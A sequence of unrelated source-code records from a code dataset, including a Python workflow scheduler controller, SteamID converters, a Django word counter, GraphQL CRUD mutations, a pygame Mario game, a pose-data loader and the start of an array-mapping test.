self.add_workflow_scheduled_jobs()\n return True\n\n def load_workflows_from_file(self, path, name_override=None, playbook_override=None):\n self.tree = cElementTree.ElementTree(file=path)\n playbook_name = playbook_override if playbook_override else os.path.splitext(os.path.basename(path))[0]\n for workflow in self.tree.iter(tag='workflow'):\n workflow_name = name_override if name_override else workflow.get('name')\n name = construct_workflow_name_key(playbook_name, workflow_name)\n key = _WorkflowKey(playbook_name, workflow_name)\n self.workflows[key] = wf.Workflow(name=name,\n xml=workflow,\n parent_name=self.name,\n playbook_name=playbook_name)\n self.add_child_workflows()\n self.add_workflow_scheduled_jobs()\n\n def load_all_workflows_from_directory(self, path=core.config.paths.workflows_path):\n if not path:\n path = core.config.paths.workflows_path\n for workflow in locate_workflows_in_directory(path):\n self.load_workflows_from_file(os.path.join(path, workflow))\n\n def add_child_workflows(self):\n for workflow in self.workflows:\n playbook_name = workflow.playbook\n children = self.workflows[workflow].options.children\n for child in children:\n workflow_key = _WorkflowKey(playbook_name, extract_workflow_name(child, playbook_name=playbook_name))\n if workflow_key in self.workflows:\n children[child] = self.workflows[workflow_key]\n\n def add_workflow_scheduled_jobs(self):\n for workflow in self.workflows:\n if (self.workflows[workflow].options.enabled\n and self.workflows[workflow].options.scheduler['autorun'] == 'true'):\n schedule_type = self.workflows[workflow].options.scheduler['type']\n schedule = self.workflows[workflow].options.scheduler['args']\n self.scheduler.add_job(self.workflows[workflow].execute, trigger=schedule_type, replace_existing=True,\n **schedule)\n\n def create_workflow_from_template(self,\n playbook_name,\n workflow_name,\n template_playbook='emptyWorkflow',\n template_name='emptyWorkflow'):\n path = '{0}{1}{2}.workflow'.format(core.config.paths.templates_path, sep, template_playbook)\n return self.load_workflow_from_file(path=path,\n workflow_name=template_name,\n name_override=workflow_name,\n playbook_override=playbook_name)\n\n def create_playbook_from_template(self, playbook_name,\n template_playbook='emptyWorkflow'):\n # TODO: Need a handler for returning workflow key and status\n path = '{0}{1}{2}.workflow'.format(core.config.paths.templates_path, sep, template_playbook)\n self.load_workflows_from_file(path=path, playbook_override=playbook_name)\n\n def remove_workflow(self, playbook_name, workflow_name):\n name = _WorkflowKey(playbook_name, workflow_name)\n if name in self.workflows:\n del self.workflows[name]\n return True\n return False\n\n def remove_playbook(self, playbook_name):\n for name in [workflow for workflow in self.workflows if workflow.playbook == playbook_name]:\n del self.workflows[name]\n return True\n return False\n\n def get_all_workflows(self):\n result = {}\n for key in self.workflows.keys():\n if key.playbook not in result:\n result[key.playbook] = []\n result[key.playbook].append(key.workflow)\n return result\n\n def get_all_playbooks(self):\n return list(set(key.playbook for key in self.workflows.keys()))\n\n def is_workflow_registered(self, playbook_name, workflow_name):\n return _WorkflowKey(playbook_name, workflow_name) in self.workflows\n\n def is_playbook_registered(self, playbook_name):\n return any(workflow_key.playbook == playbook_name for workflow_key in self.workflows)\n\n def update_workflow_name(self, old_playbook, old_workflow, new_playbook, new_workflow):\n old_key = _WorkflowKey(old_playbook, old_workflow)\n new_key = _WorkflowKey(new_playbook, new_workflow)\n self.workflows[new_key] = self.workflows.pop(old_key)\n self.workflows[new_key].name = construct_workflow_name_key(new_playbook, new_workflow)\n self.workflows[new_key].reconstruct_ancestry([self.name])\n\n def update_playbook_name(self, old_playbook, new_playbook):\n for key in [name for name in self.workflows.keys() if name.playbook == old_playbook]:\n self.update_workflow_name(old_playbook, key.workflow, new_playbook, key.workflow)\n\n def add_workflow_breakpoint_steps(self, playbook_name, workflow_name, steps):\n workflow = self.get_workflow(playbook_name, workflow_name)\n if workflow:\n for step in steps:\n workflow.breakpoint_steps.append(step)\n\n def execute_workflow(self, playbook_name, workflow_name, start='start'):\n global pool\n global workflows\n global threading_is_initialized\n\n key = _WorkflowKey(playbook_name, workflow_name)\n if key in self.workflows:\n workflow = self.workflows[key]\n subs = deepcopy(subscription.subscriptions)\n\n # If threading has not been initialized, initialize it.\n if not threading_is_initialized:\n initialize_threading()\n workflows.append(pool.submit(execute_workflow_worker, workflow, start, subs))\n callbacks.SchedulerJobExecuted.send(self)\n\n def get_workflow(self, playbook_name, workflow_name):\n key = _WorkflowKey(playbook_name, workflow_name)\n if key in self.workflows:\n return self.workflows[key]\n return None\n\n def get_all_workflows_by_playbook(self, playbook_name):\n _workflows = []\n for key in self.workflows.keys():\n if key.playbook == playbook_name:\n _workflows.append(self.workflows[key].name)\n return _workflows\n\n def playbook_to_xml(self, playbook_name):\n all_workflows = [workflow for key, workflow in self.workflows.items() if key.playbook == playbook_name]\n if all_workflows:\n xml = cElementTree.Element('workflows')\n for workflow in all_workflows:\n xml.append(workflow.to_xml())\n return xml\n else:\n return None\n\n def copy_workflow(self, old_playbook_name, new_playbook_name, old_workflow_name, new_workflow_name):\n workflow = self.get_workflow(old_playbook_name, old_workflow_name)\n workflow_copy = deepcopy(workflow)\n workflow_copy.playbook_name = new_playbook_name\n workflow_copy.name = construct_workflow_name_key(new_playbook_name, new_workflow_name)\n\n key = _WorkflowKey(new_playbook_name, new_workflow_name)\n self.workflows[key] = workflow_copy\n self.workflows[key].reconstruct_ancestry([self.name])\n\n def copy_playbook(self, old_playbook_name, new_playbook_name):\n for workflow in [workflow.workflow for workflow in self.workflows if workflow.playbook == old_playbook_name]:\n self.copy_workflow(old_playbook_name, new_playbook_name, workflow, workflow)\n\n def pause_workflow(self, playbook_name, workflow_name):\n workflow = self.get_workflow(playbook_name, workflow_name)\n wf_key = _WorkflowKey(playbook_name, workflow_name)\n self.paused_workflows[wf_key] = uuid.uuid4()\n if workflow:\n workflow.pause()\n return self.paused_workflows[wf_key].hex\n\n def resume_workflow(self, playbook_name, workflow_name, validate_uuid):\n workflow = self.get_workflow(playbook_name, workflow_name)\n wf_key = _WorkflowKey(playbook_name, workflow_name)\n if workflow:\n if validate_uuid == self.paused_workflows[wf_key].hex:\n workflow.resume()\n return \"success\"\n else:\n return \"invalid UUID\"\n return \"error: invalid playbook and/or workflow name\"\n\n def resume_breakpoint_step(self, playbook_name, workflow_name):\n workflow = self.get_workflow(playbook_name, workflow_name)\n if workflow:\n workflow.resume_breakpoint_step()\n\n # Starts active execution\n def start(self):\n if self.scheduler.state != STATE_RUNNING and self.scheduler.state != STATE_PAUSED:\n self.scheduler.start()\n else:\n return \"Scheduler already running.\"\n return self.scheduler.state\n\n # Stops active execution\n def stop(self, wait=True):\n if self.scheduler.state != STATE_STOPPED:\n self.scheduler.shutdown(wait=wait)\n else:\n return \"Scheduler already stopped.\"\n return self.scheduler.state\n\n # Pauses active execution\n def pause(self):\n if self.scheduler.state == STATE_RUNNING:\n self.scheduler.pause()\n elif self.scheduler.state == STATE_PAUSED:\n return \"Scheduler already paused.\"\n elif self.scheduler.state == STATE_STOPPED:\n return \"Scheduler is in STOPPED state and cannot be paused.\"\n return self.scheduler.state\n\n # Resumes active execution\n def resume(self):\n if self.scheduler.state == STATE_PAUSED:\n self.scheduler.resume()\n else:\n return \"Scheduler is not in PAUSED state and cannot be resumed.\"\n return self.scheduler.state\n\n # Pauses active execution of specific job\n def pause_job(self, job_id):\n self.scheduler.pause_job(job_id=job_id)\n\n # Resumes active execution of specific job\n def resume_job(self, job_id):\n self.scheduler.resume_job(job_id=job_id)\n\n # Returns jobs scheduled for active execution\n def get_scheduled_jobs(self):\n self.scheduler.get_jobs()\n\n def __scheduler_listener(self):\n event_selector_map = {EVENT_SCHEDULER_START: (lambda: callbacks.SchedulerStart.send(self)),\n EVENT_SCHEDULER_SHUTDOWN: (lambda: callbacks.SchedulerShutdown.send(self)),\n EVENT_SCHEDULER_PAUSED: (lambda: callbacks.SchedulerPaused.send(self)),\n EVENT_SCHEDULER_RESUMED: (lambda: callbacks.SchedulerResumed.send(self)),\n EVENT_JOB_ADDED: (lambda: callbacks.SchedulerJobAdded.send(self)),\n EVENT_JOB_REMOVED: (lambda: callbacks.SchedulerJobRemoved.send(self)),\n EVENT_JOB_EXECUTED: (lambda: callbacks.SchedulerJobExecuted.send(self)),\n EVENT_JOB_ERROR: (lambda: callbacks.SchedulerJobError.send(self))}\n\n def event_selector(event):\n try:\n event_selector_map[event.code]()\n except KeyError:\n print('Error: Unknown event sent!')\n\n return event_selector\n\n\ncontroller = Controller()\n","sub_path":"core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":14990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461316953","text":"\"\"\"\nConvert SteamIDs into various formats.\n\"\"\"\n\nsteamid64ident = 76561197960265728\n\n\ndef commid_to_steamid(commid):\n \"\"\"\n Convert community id to SteamID2.\n \"\"\"\n steamid = []\n steamid.append('STEAM_0:')\n steamidacct = int(commid) - steamid64ident\n\n if steamidacct % 2 == 0:\n steamid.append('0:')\n else:\n steamid.append('1:')\n\n steamid.append(str(steamidacct // 2))\n\n return ''.join(steamid)\n\n\ndef steamid_to_commid(steamid):\n \"\"\"\n Convert SteamID2 to Community ID.\n \"\"\"\n sid_split = steamid.split(':')\n commid = int(sid_split[2]) * 2\n\n if sid_split[1] == '1':\n commid += 1\n\n commid += steamid64ident\n return commid\n\n\ndef steamid_to_usteamid(steamid):\n \"\"\"\n Convert SteamID2 to SteamID3.\n \"\"\"\n steamid_split = steamid.split(':')\n usteamid = []\n usteamid.append('[U:1:')\n\n y = int(steamid_split[1])\n z = int(steamid_split[2])\n\n steamacct = z * 2 + y\n\n usteamid.append(str(steamacct) + ']')\n\n return ''.join(usteamid)\n\n\ndef commid_to_usteamid(commid):\n \"\"\"\n Convert community ID to SteamID3.\n \"\"\"\n usteamid = []\n usteamid.append('[U:1:')\n steamidacct = int(commid) - steamid64ident\n\n usteamid.append(str(steamidacct) + ']')\n\n return ''.join(usteamid)\n\n\ndef usteamid_to_commid(usteamid):\n for ch in ['[', ']']:\n if ch in usteamid:\n usteamid = usteamid.replace(ch, '')\n\n usteamid_split = usteamid.split(':')\n commid = int(usteamid_split[2]) + steamid64ident\n\n return commid\n\n\ndef usteamid_to_steamid(usteamid):\n for ch in ['[', ']']:\n if ch in usteamid:\n usteamid = usteamid.replace(ch, '')\n\n usteamid_split = usteamid.split(':')\n steamid = []\n steamid.append('STEAM_0:')\n\n z = int(usteamid_split[2])\n\n if z % 2 == 0:\n steamid.append('0:')\n else:\n steamid.append('1:')\n\n steamacct = z // 2\n\n steamid.append(str(steamacct))\n\n return ''.join(steamid)\n","sub_path":"plugins/navaltf/steamid.py","file_name":"steamid.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"28016446","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport operator\n\ndef homepage(request):\n # return HttpResponse(\"Hello\")\n #return render(request, 'home.html', {'hi':'This is me'})\n\n return render(request, 'home.html')\n\n# def eggs(reqeust):\n# return HttpResponse(\"

    Eggs are great!

    \")\n\ndef count(request):\n fulltext = request.GET['fulltext']\n # print(fulltext)\n wordlist = fulltext.split()\n\n #make empty dictionary\n worddictionary = {}\n\n for word in wordlist:\n if word in worddictionary:\n #Increase\n worddictionary[word] += 1\n else:\n #add to the dictionary\n worddictionary[word] = 1\n\n sortedwords = sorted(worddictionary.items(), key=operator.itemgetter(1), reverse=True)\n # return render(request, 'count.html', {'fulltext':fulltext, 'count':len(wordlist), 'worddictionary':worddictionary.items()})\n return render(request, 'count.html', {'fulltext':fulltext, 'count':len(wordlist), 'sortedwords':sortedwords})\n\ndef about(request):\n # name = 'Garam'\n # nationality = 'South Korea'\n # age = 27\n\n myinfo = {'name':'Garam', 'age':27, 'nationality':'S Korea'}\n return render(request, 'about.html', {'myinfo':myinfo})\n","sub_path":"wordcount/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"538380729","text":"import graphene\nfrom models.producto import Producto\nfrom models.cliente import Cliente\nfrom models.venta import Venta\nfrom models.detalleventa import VentaDetalle\nfrom schemas.producto import producObjeto\nfrom schemas.cliente import clienteObjeto\nfrom schemas.venta import ventaObjeto\nfrom schemas.detalleventa import ventaDetalleObjeto\nfrom Conexion.db_session import db_session\n\n#Mutation de agregrar\n\nclass agregarProducto(graphene.Mutation):\n class Arguments:\n nombreProducto = graphene.String()\n stock = graphene.Int()\n precio = graphene.Float()\n fechaCreacion = graphene.Date()\n fechaVencimiento = graphene.Date()\n \n nuevoProducto = graphene.Field(lambda: producObjeto)\n\n def mutate(self, info, nombreProducto, stock, precio, fechaCreacion, fechaVencimiento):\n nuevoProducto = Producto(nombreProducto= nombreProducto, stock= stock, precio= precio, fechaCreacion = fechaCreacion, fechaVencimiento = fechaVencimiento)\n db_session.session.add(nuevoProducto)\n db_session.session.commit()\n return agregarProducto(nuevoProducto = nuevoProducto)\n\nclass agregarCliente(graphene.Mutation):\n class Arguments:\n nombre = graphene.String()\n apellido = graphene.String()\n email = graphene.String()\n \n nuevoCliente = graphene.Field(lambda: clienteObjeto)\n \n def mutate(self,info, nombre, apellido, email):\n nuevoCliente = Cliente(nombre= nombre, apellido= apellido, correo= email)\n db_session.session.add(nuevoCliente)\n db_session.session.commit()\n return agregarCliente(nuevoCliente = nuevoCliente)\n\nclass agregarVenta(graphene.Mutation):\n class Arguments:\n clienteId = graphene.Int()\n fechaVenta = graphene.Date()\n\n nuevaVenta = graphene.Field(lambda: ventaObjeto)\n\n def mutate(self, info, clienteId, fechaVenta):\n nuevaVenta = Venta(clienteId, fechaVenta)\n db_session.session.add(nuevaVenta)\n db_session.session.commit()\n return agregarVenta(nuevaVenta = nuevaVenta)\n\nclass agregarDetalleVenta(graphene.Mutation):\n class Arguments:\n idVenta = graphene.Int()\n idProducto = graphene.Int()\n cantidad = graphene.Int()\n\n nuevaDetalleVenta = graphene.Field(lambda: ventaDetalleObjeto)\n\n def mutate(self, info, idVenta, idProducto, cantidad):\n nuevaDetalleVenta = VentaDetalle(idVenta, idProducto, cantidad)\n db_session.session.add(nuevaDetalleVenta)\n db_session.session.commit()\n return agregarDetalleVenta(nuevaDetalleVenta = nuevaDetalleVenta)\n\n#Mutation Update\n\nclass actualizarProducto(graphene.Mutation):\n class Arguments:\n idProducto = graphene.Int()\n nombreProducto = graphene.String()\n stock = graphene.Int()\n precio = graphene.Float()\n fechaCreacion = graphene.Date()\n fechaVencimiento = graphene.Date()\n \n updateProducto = graphene.Field(lambda: producObjeto)\n\n def mutate(self, info,idProducto, nombreProducto, stock, precio, fechaCreacion, fechaVencimiento):\n\n updateProducto = Producto.query.get(idProducto)\n updateProducto.nombreProducto = nombreProducto\n updateProducto.stock = stock\n updateProducto.precio = precio\n updateProducto.fechaCreacion = fechaCreacion\n updateProducto.fechaVencimiento = fechaVencimiento\n\n db_session.session.add(updateProducto)\n db_session.session.commit()\n return actualizarProducto(updateProducto = updateProducto)\n\nclass actualizarCliente(graphene.Mutation):\n class Arguments:\n idCliente = graphene.Int()\n nombre = graphene.String()\n apellido = graphene.String()\n email = graphene.String()\n \n updateCliente = graphene.Field(lambda: clienteObjeto)\n \n def mutate(self,info,idCliente, nombre, apellido, email):\n updateCliente = Cliente.query.get(idCliente)\n \n updateCliente.nombre = nombre\n updateCliente.apellido = apellido\n updateCliente.email = email\n db_session.session.add(updateCliente)\n db_session.session.commit()\n return actualizarCliente(updateCliente = updateCliente)\n\nclass actualizarVenta(graphene.Mutation):\n class Arguments:\n ventaId = graphene.Int()\n clienteId = graphene.Int()\n fechaVenta = graphene.Date()\n\n updateVenta = graphene.Field(lambda: ventaObjeto)\n\n def mutate(self, info, ventaId, clienteId, fechaVenta):\n updateVenta = Venta.query.get(ventaId)\n\n updateVenta.clienteId = clienteId\n updateVenta.fechaVenta = fechaVenta\n \n db_session.session.add(updateVenta)\n db_session.session.commit()\n return actualizarVenta(updateVenta = updateVenta)\n\nclass actualizarDetalleVenta(graphene.Mutation):\n class Arguments:\n idVentaDetalle = graphene.Int()\n idVenta = graphene.Int()\n idProducto = graphene.Int()\n cantidad = graphene.Int()\n \n updateDetalleVenta = graphene.Field(lambda: ventaDetalleObjeto)\n\n def mutate(self, info, idVentaDetalle, idVenta, idProducto, cantidad):\n updateDetalleVenta = VentaDetalle.query.get(idVentaDetalle)\n\n updateDetalleVenta.idVenta = idVenta\n updateDetalleVenta.productoId = idProducto\n updateDetalleVenta.cantidad = cantidad\n\n db_session.session.add(updateDetalleVenta)\n db_session.session.commit()\n return actualizarDetalleVenta(updateDetalleVenta = updateDetalleVenta)\n\n# Eliminar\n\nclass eliminarProducto(graphene.Mutation):\n class Arguments:\n idProducto = graphene.Int()\n \n deleteProducto = graphene.Field(lambda: producObjeto)\n\n def mutate(self, info, idProducto):\n\n deleteProducto = Producto.query.get(idProducto)\n\n db_session.session.delete(deleteProducto)\n db_session.session.commit()\n return eliminarProducto(deleteProducto = deleteProducto)\n\nclass eliminarCliente(graphene.Mutation):\n class Arguments:\n idCliente = graphene.Int()\n \n deleteCliente = graphene.Field(lambda: clienteObjeto)\n \n def mutate(self,info, idCliente):\n deleteCliente = Cliente.query.get(idCliente)\n\n db_session.session.delete(deleteCliente)\n db_session.session.commit()\n return eliminarCliente(deleteCliente = deleteCliente)\n\nclass eliminarVenta(graphene.Mutation):\n class Arguments:\n ventaId = graphene.Int()\n\n deleteVenta = graphene.Field(lambda: ventaObjeto)\n\n def mutate(self, info, ventaId):\n deleteVenta = Venta.query.get(ventaId)\n \n db_session.session.delete(deleteVenta)\n db_session.session.commit()\n return eliminarVenta(deleteVenta = deleteVenta)\n\nclass eliminarDetalleVenta(graphene.Mutation):\n class Arguments:\n idVentaDetalle = graphene.Int()\n \n deleteDetalleVenta = graphene.Field(lambda: ventaDetalleObjeto)\n\n def mutate(self, info, idVentaDetalle):\n deleteDetalleVenta = VentaDetalle.query.get(idVentaDetalle)\n\n db_session.session.delete(deleteDetalleVenta)\n db_session.session.commit()\n return eliminarDetalleVenta(deleteDetalleVenta = deleteDetalleVenta)\n\nclass Mutation(graphene.ObjectType):\n addCliente = agregarCliente.Field()\n addProducto = agregarProducto.Field()\n addVenta = agregarVenta.Field()\n addVentaDetalle = agregarDetalleVenta.Field()\n updateProducto = actualizarProducto.Field()\n updateCliente = actualizarCliente.Field()\n updateVenta = actualizarVenta.Field()\n updateVentaDetalle = actualizarDetalleVenta.Field()\n deleteProducto = eliminarProducto.Field()\n deleteCliente = eliminarCliente.Field()\n deleteVenta = eliminarVenta.Field()\n deleteVentaDetalle = eliminarDetalleVenta.Field()","sub_path":"controlador/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":7750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"654039117","text":"def gcd( a , b ):\n if a < b:\n a,b = b,a\n if a%b == 0:\n return b\n return gcd( b , a%b )\n\ndef lcm( a , b ):\n return int( a/gcd(a,b) * b )\n\nif __name__ == \"__main__\":\n A,B = [int(x) for x in input().split()]\n print( lcm(A,B) )\n","sub_path":"01/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"230184605","text":"import numpy\nimport matplotlib.pyplot as plt\n\na = [1, 2, 3, 4]\nx1 = numpy.array(a)\nprint(type(x1))\n\nx2 = numpy.arange(11)\nprint(x2)\n\n#x3 = numpy.loadtxt('', delimiter='', skiprows=1)\n\nN = 1000\nheight = [155, 160, 165, 170]\nweight = [50, 55, 60, 65]\nplt.scatter(height, weight)\nplt.show()\n","sub_path":"np1.py","file_name":"np1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476208257","text":"def judgePoint24(self, nums):\n if len(nums) == 1:\n return math.isclose(nums[0], 24)\n return any(self.judgePoint24([x] + [num for k, num in enumerate(nums) if k not in (i, j)])\n for i, a in enumerate(nums) for j, b in enumerate(nums) if i != j\n for x in {a + b, a * b, a - b, b - a, b and a / b, a and b / a})\n\n\n# Just go through all pairs of numbers a and b and replace them with a +\n# b, a * b, etc. Use recursion for the now smaller list. Positive base\n# case is the list being[24](or close enough).\n\n# I prevent division - by - zero by using b and a / b instead of just a /\n# b. If b is zero, then b and a / b is zero. And it's ok to have that\n# zero, since a*b is zero as well. It's not even a second zero, because\n# I'm creating a set of the up to six operation results, so duplicates are\n# ignored immediately.\n\n# Oh and note that I'm using Python 3, so / is \"true\" division, not\n# integer division like in Python 2. And it would be better to use\n# fractions.Fraction instead of floats. I actually just realized that\n# there is in fact an input where simple floats fail, namely [3, 3, 8, 8].\n# Floats calculate 23.999999999999989341858963598497211933135986328125\n# instead of 24. It's not in the judge's test suite, but it should be\n# soon. Using Fraction however made my solution exceed the time limit, so\n# I settled for the above approximation solution.\n","sub_path":"problems/679.24_Game/stefan-104018_recursion.py","file_name":"stefan-104018_recursion.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620338529","text":"from data_loaders.utils import create_dataloader_test, create_dataloader_train_2d, create_dataloader_test_2d\nimport numpy as np\nimport os\nimport tensorflow as tf\nfrom configs.dataset_config import DatasetConfig\n\n\nclass HumanPoseDSLoader(object):\n def __init__(self):\n self.DATA_PATH = DatasetConfig.DATA_PATH\n self.TRAIN_BATCH_SIZE = DatasetConfig.TRAINBATCH_SIZE\n self.TEST_BATCH_SIZE = DatasetConfig.TESTBATCH_SIZE\n self.images_loader = None\n self.p3d_gt_loader = None\n self.p2d_gt_loader = None\n self.p3d_gt = None\n self.p2d_gt = None\n self.p3d_std = None\n self.p3d_mean = None\n self.image_paths = None\n self.num_joints = 17\n self.heatmap_size = np.array([64, 64])\n self.image_size = np.array([256, 256])\n self.use_different_joints_weight = True\n self.joints_weight = 1\n self.sigma = 2\n self.pose_loader = None\n\n def load_data_train_2d_heatmaps(self):\n data_loader, image_paths, annotations = create_dataloader_train_2d(data_root=self.DATA_PATH,\n batch_size=self.TRAIN_BATCH_SIZE)\n im_loader, p2d_gt_loader = data_loader\n self.images_loader = im_loader\n self.p2d_gt_loader = p2d_gt_loader\n self.image_paths = image_paths\n self.p3d_gt = annotations[\"pose3d\"]\n self.p2d_gt = annotations[\"pose2d\"]\n\n def load_data_test_images(self):\n data_loader, image_paths = create_dataloader_test(data_root=self.DATA_PATH, batch_size=self.TEST_BATCH_SIZE)\n # load mean and std\n im_loader = data_loader\n p3d_mean = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"mean.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"std.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = tf.constant(p3d_std)\n p3d_mean = tf.constant(p3d_mean)\n p3d_std = tf.tile(p3d_std, [self.TEST_BATCH_SIZE, 1, 1])\n p3d_mean = tf.tile(p3d_mean, [self.TEST_BATCH_SIZE, 1, 1])\n # normalize 3d pose\n self.images_loader = im_loader\n self.image_paths = image_paths\n self.p3d_std = p3d_std\n self.p3d_mean = p3d_mean\n\n def load_data_test_2d_pose(self, csv_file):\n data_loader = create_dataloader_test_2d(batch_size=self.TEST_BATCH_SIZE, csv_file=csv_file)\n # load mean and std\n pose_loader = data_loader\n p3d_mean = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"mean.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"std.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = tf.constant(p3d_std)\n p3d_mean = tf.constant(p3d_mean)\n p3d_std = tf.tile(p3d_std, [self.TEST_BATCH_SIZE, 1, 1])\n p3d_mean = tf.tile(p3d_mean, [self.TEST_BATCH_SIZE, 1, 1])\n # normalize 3d pose\n self.pose_loader = pose_loader\n self.p3d_std = p3d_std\n self.p3d_mean = p3d_mean\n\n\n\n","sub_path":"data_loaders/human_pose_ds_loader.py","file_name":"human_pose_ds_loader.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415319724","text":"import sys, pygame\nfrom pygame.locals import *\nfrom time import clock\n \n#Tamaño la pantalla\nWIDTH = 900\nHEIGHT = 500\n\nMposX =300\nMposY =318\n\ncont=6\ndirec=True\ni=0\n \nbajada=False\nsalto = False\ntiempo=180##el tiempo del juego que va aser de 3 minutos para pasar el nivle\n\n\ndef Initialize():\n global screen, clock,xixf,Rxixf\n pygame.init() \n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Mario\")\n clock = pygame.time.Clock()\n xixf={}\n Rxixf={}\n xixf[0]=(0,0,20,41)\n xixf[1]=(22,0,25,41)\n xixf[2]=(47,0,25,41)\n xixf[3]=(73,0,20,41)\n xixf[4]=(93,0,27,41)\n xixf[5]=(120,0,27,41)\n Rxixf[0]=(122,0,22,41)\n Rxixf[1]=(96,0,25,41)\n Rxixf[2]=(74,0,22,41)\n Rxixf[3]=(50,0,23,41)\n Rxixf[4]=(24,0,26,41)\n Rxixf[5]=(0,0,25,41)\n \n \ndef LoadContent():\n global fondo, mario,mario_inv,enemig \n fondo = imagen(\"imagenes/fondo.png\") \n mario = imagen(\"imagenes/sprites_mario.png\",True) \n mario_inv=pygame.transform.flip(mario,True,False);\n fondo = pygame.transform.scale(fondo, (1000, 400))\n \n \ndef Updates(): \n teclado() \n #Escenario\n sprite_M() \n #Enemigo()\n #Coliciones()\n \n\ndef Draw():\n global salto,salto_Par, salto,bajada_Par,bajada\n screen.blit(fondo, (0, 0))\n global MposX,MposY\n if direc==True and salto==False :\n screen.blit(mario, ( MposX, MposY),(xixf[i]))\n \n if direc==False and salto==False :\n screen.blit(mario_inv, ( MposX, MposY),(Rxixf[i]))\n \n \n #salto normal y Parabolico\n if salto==True: \n \n if direc==True:\n screen.blit(mario, ( MposX, MposY),(xixf[4]))\n if direc==False:\n screen.blit(mario_inv, ( MposX, MposY),(Rxixf[4])) \n \n if bajada==False:\n MposY-=4 \n \n if bajada==True:\n MposY+=4 \n \n if MposY<=186:\n bajada=True\n \n if MposY>=318:\n bajada=False\n salto=False\n #============================== \n\n \n #pygame.display.flip()\n \n#=================IMAGEN====================================\ndef imagen(filename, transparent=False):##Enviamos para imagen,si no se especifica la tranparencia es falso\n try: image = pygame.image.load(filename)##si tenemos algun error al cargar de archivos Filename = es la ruta de nuestro archivo \n except pygame.error as message:##si existe erro con el algun mensaje a consola\n raise SystemExit(message)\n image = image.convert()##va a convertir la imagen a formato interno de python para que sea mas factible para el interprete manejar a la imagen\n if transparent:## si transparente = true\n color = image.get_at((0,0))##obtener el color que se encuentra en la parte superior izquierda\n image.set_colorkey(color, RLEACCEL)## no se va a mostrar el color \n return image\n \n#======================TECLADO===================================\ndef teclado():\n global cont, direc,salto,MposX\n teclado = pygame.key.get_pressed()\n if teclado[K_UP]:\n salto=True\n sonido= pygame.mixer.Sound(\"Sonidos/salto.wav\")\n sonido.play();\n \n \n if teclado[K_RIGHT]:\n if MposX<=810:\n MposX+=2\n cont+=1\n direc=True\n \n \n \n elif teclado[K_LEFT]:\n if MposX>10:\n MposX-=2\n print(MposX)\n cont+=1\n direc=False\n \n else :\n cont=6\n \n # Cerrar la ventana\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n \n#===================SPRITE===============================\ndef sprite_M():\n global cont \n p=6\n global i\n if cont==p:\n i=0\n if cont==p*2:\n i=1\n if cont==p*3:\n i=2\n if cont==p*4:\n i=3\n if cont==p*5:\n i=4\n if cont==p*6:\n i=5\n cont=0\n\n \ndef main():\n Initialize()\n LoadContent()\n pygame.mixer.music.load(\"Sonidos/Mario.mp3\")#llamada a la musica\n pygame.mixer.music.play(-1)\n enemigos=[]\n enemigos.append(250)\n fuente1 = pygame.font.SysFont(\"Arial\",20,True,False)\n vidas=3\n puntaje=1\n\n while True:\n time = clock.tick(60)\n Updates()\n Draw()\n LoadContent()\n \n segundos=tiempo-pygame.time.get_ticks()/1000\n segundos=int(segundos)##transformamos la imagen a int\n segundos=\"Timpo: \"+str(segundos)##la transformamos a texto para poderla imprimir en pantalla\n contador=fuente1.render(segundos,0,(0,0,230))##imprimimos nuestro contador de tiempo\n vid=\"Vidas: \"+str(vidas)\n vids=fuente1.render(vid,0,(0,0,230))\n puntaje=puntaje+0.1\n ##puntaje=int(puntaje)\n punt=\"Puntaje: \"+str(puntaje)\n punts=fuente1.render(punt,0,(0,0,230))\n screen.blit(vids,(100,5))##Imprime el tiempo del jueg\n screen.blit(contador,(0,5))##Imprime el tiempo del jueg\n screen.blit(punts,(200,5))##Imprime el tiempo del jueg\n\n pygame.display.flip()\n \n \nmain()\n","sub_path":"Mario Bros/Mario final/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114279203","text":"import unittest\n\nimport zserio\n\nfrom testutils import getZserioApi\n\nclass ArraysMappingTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"array_types.zs\").arrays_mapping\n\n def testUnsignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setUint8Array(intArray)\n arraysMapping.setUint16Array(intArray)\n arraysMapping.setUint32Array(intArray)\n arraysMapping.setUint64Array(intArray)\n\n def testSignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = 